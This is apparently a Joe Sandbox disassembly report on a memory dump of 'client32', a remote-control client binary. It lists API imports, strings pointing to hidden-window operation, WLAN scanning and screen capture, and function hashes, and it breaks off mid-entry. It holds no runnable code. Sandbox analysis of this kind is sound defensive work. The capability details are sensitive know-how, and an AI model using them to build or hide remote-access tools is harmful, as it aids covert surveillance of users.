                                                                                                                                                                                                    • String ID: %02x $%04x: %s$..\ctl32\Connect.cpp$Compression Error. (s%d) NSMConnection::DoStream **** not selected ****$Decomp, nbytes_c=%d$Decompress error: %s$DoStream error, been_reset=1$F$datalen + idata->recvbytes <= MAX_DEFLATE_SIZE (MAX_STREAMLEN)$nclen=%d, bytesleft=%d, cmd=%d (%x), nbytes_c=%d, nbytes_uc=%d, p=%x, p0=%x$offset=%04x, nbytes=%04x (%d), nc=x%x
                                                                                                                                                                                                    • API String ID: 0-4168416193
                                                                                                                                                                                                    • Opcode ID: 899b97f94cfa9678fdf6eb455168cb10ce1bc93072f683e8b541ce37095d998f
                                                                                                                                                                                                    • Instruction ID: 6bc3b423fe9e58ad3992282e61b86e9f2554b466721a9916031d5a1a83f6629d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 899b97f94cfa9678fdf6eb455168cb10ce1bc93072f683e8b541ce37095d998f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FA15D75E012299FDB24CF64CC81BEEB7B9BF49744F5040E9E949A7240E7316A80CF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,11136285,00000000,?,?), ref: 1112D638
                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000,?,11136285,00000000,?,?), ref: 1112D667
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastShowWindow
                                                                                                                                                                                                    • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                                                                                                                                                    • API String ID: 3252650109-4091810678
                                                                                                                                                                                                    • Opcode ID: 90b88cc160fa5e910e9b8402eb8dd17e171ab97e4abd2f8fdd96a39cb16427aa
                                                                                                                                                                                                    • Instruction ID: fa0dcf7bfd4a991f80e84da17f5d1f9dbb64edff6fc809840f3415ca9232f2cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90b88cc160fa5e910e9b8402eb8dd17e171ab97e4abd2f8fdd96a39cb16427aa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A761E371B40315AFEB11CBD4CC85F6AF7A5E744B18F604129F625AB2C4EAB16840CB85
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(wlanapi.dll,?,11057147), ref: 1115705B
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 11157074
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 11157084
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 11157094
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111570A4
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111570B4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoadwsprintf
                                                                                                                                                                                                    • String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
                                                                                                                                                                                                    • API String ID: 2170448811-1736626566
                                                                                                                                                                                                    • Opcode ID: 4abc1ebb41a915a1e68705d27eae302cf7f0fb804471937ee6b8da54ad230a0c
                                                                                                                                                                                                    • Instruction ID: caad9b3ffb412b0ce201366128ee2238a993313849ab4ce7a7f1ca44c3893492
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4abc1ebb41a915a1e68705d27eae302cf7f0fb804471937ee6b8da54ad230a0c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6521E1B5A01718AFC751EFADCD809ABFBF9AF58204700C92AE469C3301E670E401CF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetObjectA.GDI32(?,0000003C,?), ref: 110773B6
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 110773C6
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 110773D5
                                                                                                                                                                                                      • Part of subcall function 11142640: GetStockObject.GDI32(0000000D), ref: 11142696
                                                                                                                                                                                                      • Part of subcall function 11142640: GetObjectA.GDI32(00000000,0000003C,?), ref: 111426A8
                                                                                                                                                                                                      • Part of subcall function 11142640: GetDC.USER32(00000000), ref: 111426D4
                                                                                                                                                                                                      • Part of subcall function 11142640: GetDeviceCaps.GDI32(00000000,0000005A), ref: 111426E3
                                                                                                                                                                                                      • Part of subcall function 11142640: ReleaseDC.USER32(00000000,00000000), ref: 111426EE
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 110773FF
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 11077430
                                                                                                                                                                                                    • GetTextMetricsA.GDI32(00000000,?), ref: 1107743A
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11077445
                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 1107746B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Object$CreateFontIndirectReleaseSelect$CapsDeviceMetricsStockText
                                                                                                                                                                                                    • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$hdc$m_hWnd
                                                                                                                                                                                                    • API String ID: 493089868-3554473032
                                                                                                                                                                                                    • Opcode ID: 3ddb08b226eeef3e3cf29cf42d01429a3994289165f9e7795ec8246a6313bac5
                                                                                                                                                                                                    • Instruction ID: 566009e177766ebeb0e550f92529a77eb0c2acbf5992a78103c0b9fb2db6236f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ddb08b226eeef3e3cf29cf42d01429a3994289165f9e7795ec8246a6313bac5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E31C076E0162AAFD711DFA1CCC5EDEF7B8EB48358F108069F914A3205EB70A944CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 110ED788
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 110ED7A8
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,1113EA00), ref: 110ED7B2
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 110ED7B8
                                                                                                                                                                                                    • GetObjectA.GDI32(1113EA00,00000018,?), ref: 110ED7C6
                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 110ED7D5
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110ED7E0
                                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 110ED806
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,1113EA00), ref: 110ED811
                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 110ED81A
                                                                                                                                                                                                    • SelectObject.GDI32(11003D26,1113EA00), ref: 110ED82A
                                                                                                                                                                                                    • DeleteDC.GDI32(11003D26), ref: 110ED830
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110ED835
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Object$Select$CompatibleCreate$Delete$BitmapRelease
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1133104291-0
                                                                                                                                                                                                    • Opcode ID: ceb17ec1d72bb40bc7306424dc9f0ad1c8efb8a277b4ca78c2ab396d6f478ee4
                                                                                                                                                                                                    • Instruction ID: 1258555e92a1aaff948274f601fb2b09853c3fe6d534e09920ba7dca75f72fb8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ceb17ec1d72bb40bc7306424dc9f0ad1c8efb8a277b4ca78c2ab396d6f478ee4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC314C75D41229BFDB01DFA9CC84FAEB7BCEB89714F10805AF904E3240D674AE418BA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                                    • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                                                                                                                                    • API String ID: 2111968516-2092292787
                                                                                                                                                                                                    • Opcode ID: bba3f28cac02fdec35f39604ef1b7e8ddb146cd2578dacf2bc8be98a87cc9d04
                                                                                                                                                                                                    • Instruction ID: 3cf3aa25874edefcff3c72479187094ffc842d22b257f1b299c377845cd1dbea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bba3f28cac02fdec35f39604ef1b7e8ddb146cd2578dacf2bc8be98a87cc9d04
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCF06C3A68111D57AB0187ED780547EF38D678057D7C8809AF8BCEBE20E912DCE0A296
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 110895B3
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 11089685
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 110896EF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,?,?,?), ref: 11089704
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 11089710
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1108977E
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 110897EC
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 110897F6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$CriticalInterlockedSection$CreateCurrentDecrementEnterIncrementLeaveResetThreadwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\EVMNGR.cpp$iEventsToCall < ARRAYSIZE(pEventsToCall)$m_pfnEvHandler
                                                                                                                                                                                                    • API String ID: 2547936257-3096566241
                                                                                                                                                                                                    • Opcode ID: 5a8e6f736a4f75f8cc30d27d77e1b2cebf91cc8d4c7ef2a03178e221b9261355
                                                                                                                                                                                                    • Instruction ID: acc9ecc39ebb1e2decf3079a2f80573fc51f1b25f403f4e97c3333a9b2de6fc3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a8e6f736a4f75f8cc30d27d77e1b2cebf91cc8d4c7ef2a03178e221b9261355
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28A16275E04246EFDB01EF94C484B9EBBF5BF88318F158199E815DB241E735E980CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetVersionExA.KERNEL32(?), ref: 11141B0E
                                                                                                                                                                                                      • Part of subcall function 11141AB0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
                                                                                                                                                                                                      • Part of subcall function 11141AB0: FreeLibrary.KERNEL32(00000000), ref: 11141B5F
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,NSMCltReplayClass,?,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000), ref: 1105B226
                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 1105B298
                                                                                                                                                                                                    • UpdateWindow.USER32(00000000), ref: 1105B339
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 1105B2CD
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • UpdateWindow.USER32(00000000), ref: 1105B363
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000003), ref: 1105B390
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$ExitLibraryProcessUpdate$AddressCreateDefaultErrorFreeLangLastLoadMessageProcRectSystemVersionVisiblewsprintf
                                                                                                                                                                                                    • String ID: CltReplay.cpp$NSMCltReplayClass$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_hWnd || !"CltReplayClass Window failed to create"
                                                                                                                                                                                                    • API String ID: 4274928939-1619494117
                                                                                                                                                                                                    • Opcode ID: 6bea5c09297829cbfb848c60cb5d7fef759d0651ead25e322a2e7de13e6ca9cc
                                                                                                                                                                                                    • Instruction ID: 79629effa54c5317598ac1fd62f88e21f554d2986a4eda5a7fee751a18d8bf94
